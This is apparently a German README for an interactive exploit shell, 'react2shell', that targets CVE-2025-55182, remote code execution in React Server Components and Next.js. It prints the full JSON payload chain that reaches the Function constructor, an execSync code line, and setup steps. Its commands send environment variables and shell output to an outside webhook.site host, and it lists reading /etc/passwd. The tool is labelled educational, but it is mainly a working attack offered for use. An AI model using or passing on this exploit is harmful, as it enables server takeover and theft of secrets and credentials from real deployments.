
CVE-2025-55182 Interaktiver PoC - React Server Components RCE - Sicherheitsforschung zu Bildungszwecken
Interaktive Shell zum Ausnutzen von CVE-2025-55182, einer Remote-Code-Ausführungslücke in React Server Components.
Dieses Tool dient ausschließlich zu BILDUNGSZWECKEN und zu AUTORISIERTEN SICHERHEITSTESTS.
CVE-2025-55182 betrifft React Server Components (RSC) in:
Die Schwachstelle ermöglicht Remote-Code-Ausführung (RCE) durch bösartige Payloads, die an Server Actions gesendet werden.
$@x, um auf interne Chunk-Objekte zu verweisen.then()-Methoden (Promise-ähnlich)_response-, _formData- und _prefix-EigenschaftenFunction-Constructor gelangen$3:constructor:constructor → Function-Constructor → RCE
git clone https://github.com/NathanJ60/react2shell-interactive.git
cd react2shell-interactive
npm install
Bearbeite exploit.js und aktualisiere diese Werte:
const TARGET_URL = 'http://localhost:3000/' // Verwundbarer Next.js-Server
const WEBHOOK_URL = 'https://webhook.site/YOUR-ID' // Ihre Webhook-URL
Hole dir einen kostenlosen Webhook unter: https://webhook.site
node exploit.js
react2shell> !test
[+] Gesendet! Webhook prüfen
react2shell> whoami
[+] Gesendet: whoami
react2shell> ls -la
[+] Gesendet: ls -la
react2shell> !env
[+] Gesendet! Webhook auf Umgebungsvariablen prüfen
Ergebnisse erscheinen in Ihrem Webhook, nicht im Terminal.
{
'0': '$1',
'1': {
'status': 'resolved_model',
'reason': 0,
'_response': '$4',
'value': '{"then":"$3:map","0":{"then":"$B3"},"length":1}',
'then': '$2:then'
},
'2': '$@3',
'3': [],
'4': {
'_prefix': '<JAVASCRIPT_CODE>//',
'_formData': { 'get': '$3:constructor:constructor' },
'_chunks': '$2:_response:_chunks'
}
}
next-action gesendet$@3 erstellt eine Chunk-Referenz$3:constructor:constructor traversiert zu Function_prefix wird an Function() übergeben und ausgeführtrequire() nicht verfügbarimport() verwenden:
import("child_process").then(cp => cp.execSync("whoami"))
Aktualisieren Sie auf diese Versionen, um die Schwachstelle zu beheben:
MIT-Lizenz – Nur zu Bildungszwecken.
Sicherheitsforschungs-PoC – Verantwortungsvoll verwenden.
| Befehl | Beschreibung |
|---|
!test | Testet, ob der Exploit funktioniert (sendet Bestätigung an den Webhook) |
!env | Exportiert Umgebungsvariablen (process.env) |
!js <code> | Führt benutzerdefiniertes JavaScript aus |
!help | Hilfe anzeigen |
!exit | Beenden |
<command> | Shell-Befehl ausführen (z. B. whoami, ls, cat /etc/passwd) |